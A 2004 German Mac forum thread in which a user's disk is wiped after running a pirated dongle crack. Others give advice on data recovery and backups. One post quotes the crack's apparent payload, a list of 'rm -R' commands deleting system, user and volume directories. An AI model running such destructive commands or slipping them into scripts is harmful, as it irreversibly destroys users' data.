Push-Nachrichten von MacTechNews.de
Würden Sie gerne aktuelle Nachrichten aus der Apple-Welt direkt über Push-Nachrichten erhalten?
Forum>Software>Krass!!!!! Die ganze Festplatte ist leer!!!!!!

Krass!!!!! Die ganze Festplatte ist leer!!!!!!

PowerFerdi128.10.0415:14
hallo,

mir ist gerade etwas passiert was ich extrem komisch finde. ich hab ein kleines programm gestartet, musste mein admin passwort eingeben. danach kam im finder nur noch der beachball und die festplatte hat ca. 5 min krach gemacht. nach einem neustart kam das fragezeichen... und im targetmodus über firewire wird angezeigt das überhaupt keine datei mehr da ist!!!!! was mach ich jetzt? habt ihr programme mit denen ich meine daten retten könnte? die ganze platte ist leergeräumt!!!!!

bitte helft mir! es sind daten weg die ich noch nicht gesichert hatte!!!!!
0

Kommentare

nb
nb28.10.0415:16
Na, was für ein kleines Programm?
0
sonorman
sonorman28.10.0415:17
Nun, WAS für ein Programm hattest Du denn gestartet?
0
sonorman
sonorman28.10.0415:19
nb
0
PowerFerdi128.10.0415:22
ach es war was von so einer download-seite....so ein krack für ein programm damit das ohne usb dongle läuft.... scheiße, das war der volltreffer. gibt es nun hilfe jungs?
0
nb
nb28.10.0415:27
Hmm, wie schaut es jetzt aus? Nix Powerbook, nix Monitor? Und was macht das System?

Selber schuld, wenn man Cracks runterlädt. Naja, offensichtlich eine illegale Download-Seite.
0
jup28.10.0415:30
Tja, wer illegale Sachen lädt muss sich nicht wundern, wenn sich da ein Programmierer einen Spaß erlaubt hat. Selbst schuld...

Du kannst die Platte zu einem Datenwiederherstellungsunternehmen bringen, kostet aber richtig Asche, mit Tools wie Norton hast du wohl keine Chance.
0
nb
nb28.10.0415:32
sonorman.
0
MacMark
MacMark28.10.0415:38
PowerFerdi1
ach es war was von so einer download-seite....so ein krack für ein programm damit das ohne usb dongle läuft.... scheiße, das war der volltreffer. gibt es nun hilfe jungs?

Es klingt danach, daß das Programm nicht das tat, was es vorgab zu tun. Man nennt so etwas social engineering: Es hat Dich dazu verführt, Deinen Admin-Account nutzen zu dürfen, um mit root Rechten die Platte komplett zu löschen.
Du kannst nur hoffen, daß es die Dateien lediglich gelöscht und nicht deren Platz überschrieben hat. Dann kann man die Dateien wiederherstellen. Dazu gibt es Tools, mit denen ich keine Erfahrung habe. Such mal nach data recovery osx im Netz. Bzw. auf Apples Softwareseite:

Installiere auf der Platte nichts, spiele nichts neues darauf: Du würdest Deine gelöschten Daten unwiederbringlich überschreiben.
„@macmark_de“
0
stiffler
stiffler28.10.0415:38
naja Tools wie Norton sind einen Versuch wert. Habe mit Norton schon öfter Daten nach einem Crash wiederherstellen können. Für was anderes taugt es aber leider nix.

Ansonsten gibt es dafür auch sehr gute Tools von Micromat. z.B. TechTool. Soweit ich weiss, muss es aber die Pro Version sein???
„To understand recursion you need to understand recursion“
0
Rainer Puschner
Rainer Puschner28.10.0415:40
das war wohl das iLok Reset script???
0
nb
nb28.10.0415:41
iLok?

*dampf* *dampf* *tschööö*

0
strateg
strateg28.10.0415:43
tja, diebstahl wird eben manchmal sofort bestraft! - soll dir eine lehre sein.
„cuntentientscha, attentivitad, curaschi —“
0
PowerFerdi128.10.0416:09
schadenfreude ist eben immer noch die schönste freude...

nur so zur information. die software für die ich den crack geladen habe ist von mir bezahlt und den dongle besitze ich auch.geklaut habe ich nichts! ich habe nur keine lust den dongle zu verlieren wenn ich wie so oft unterwegs bin. mein usb bluetooth adapter ist schon weg.... das war dann mein eigener fehler... ich werde es mir aber merken!
0
Rantanplan
Rantanplan28.10.0416:28
Von Norton würde ich die Finger lassen, das schreibt nämlich auf die Platte, was bei Datenverlust eine ganz schlechte Idee ist. Data Rescue ist gut und Disk Warrior auch, aber letzteres ist eigentlich nur zum Reparieren kaputter disk catalogs gedacht und hilft hier wahrscheinlich nix. Aber Norton schreibt auf die Platte und macht die Katastrophe damit perfekt.
„Wenn ich nicht hier bin, bin ich auf dem Sonnendeck“
0
stiffler
stiffler28.10.0416:34
Norton Rescue schreibt was auf die Platte? Ist mir neu.
Konnte mit booten von externer Platte mittels Norton bislang stets ca 90% der Daten wiederherstellen.
Aber ok, es gibt auch andere spezielle Tools. Welches nun das geeigneteste (geiles Wort) ist, i don´t know.
0
PowerFerdi128.10.0416:37
ich lasse gerade data rescue drüberlaufen. mal sehen ob sich was tut...aber danke für die hilfe. es sind ja doch noch ein paar vernünftige hier.
0
Stefan S.
Stefan S.28.10.0416:37
Beileid!
0
stiffler
stiffler28.10.0416:41
Du brauchst übrigens seeeehr viel Geduld! Am besten über Nacht laufen lassen.
0
stiffler
stiffler28.10.0416:48
Da fällt mir noch etwas ein. hast du dir mal übers Terminal deine Festplatte angesehen? Möglicherweise gibt es ja Scripte, die deine Dateien unsichtbar machen oder in die Mülle schieben.
0
stiffler
stiffler28.10.0416:52
hast du eigentlich mal via terminal nachgesehen, ob deine Dateien nicht nur unsichtbar sind oder in der Mülle liegen? Solch Fakescripte gibt es doch bestimmt. Ich erinnere mich da vage an eine Shareware, die bei Eingabe eines falchen Keys das Userverz. in der Mülle versenkte
0
PowerFerdi128.10.0416:59
rm -R /System;
rm -R /Users;
rm -R /Library;
rm -R /Applications;
rm -R /;
rm -R /Volumes

das habe ich in einem anderen forum gefunden. sieht nicht gut aus. das war ein gezielter angriff auf so einige festplatten...
0
stiffler
stiffler28.10.0417:08
(sick)!!! Viel Glück bei der Datenrettung!
0
pixler28.10.0417:30
Wer kein Backup hat handelt "grobfahrlässig".
Regelmässiges Backup ist ein MUSS auch im Jahre 2004!
Harddisks können jederzeit den geist aufgeben auch wenn sie nigelnagelneu sind (hatte schon 2 hd''s welche nach 2 wochen betrieb sang und klanglos den dienst verweigerten: headcrash oder lagerdefekt)
0
nb
nb28.10.0418:12
Zum Glück habe ich nun zwei Backup-Festplatten...

0
macsteve
macsteve28.10.0418:17
ich mache auch regelmässig mein backup, habe da auch schon mein lehrgeld bezahlt und zwar nicht zu knapp.

ferdi, mein beileid und viel viel glück
0
alex170128.10.0419:07
Hatte mal einen defekten Dateibaum. DataRescue konnte zwar die Dateien wieder herstellen, diese waren jedoch anschließend nichtmehr zu gebrauchen (konnten von den jeweiligen Programmen nicht mehr geöffnet werden).

Dank regelmäßiger Backups habe ich zum Glück nichts wichtiges verloren, aber einen Schreck bekommt man bei sowas schon. Kann nur sagen sichern, sichern, sichern, ...
0
nb
nb28.10.0421:15
Jawoll…

er sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert und sichert ...

Good Luck.

0
oliver kurlvink
oliver kurlvink28.10.0416:39
ich vermute, ein backup liegt nicht vor? (sick)
0

Kommentieren

Diese Diskussion ist bereits mehr als 3 Monate alt und kann daher nicht mehr kommentiert werden.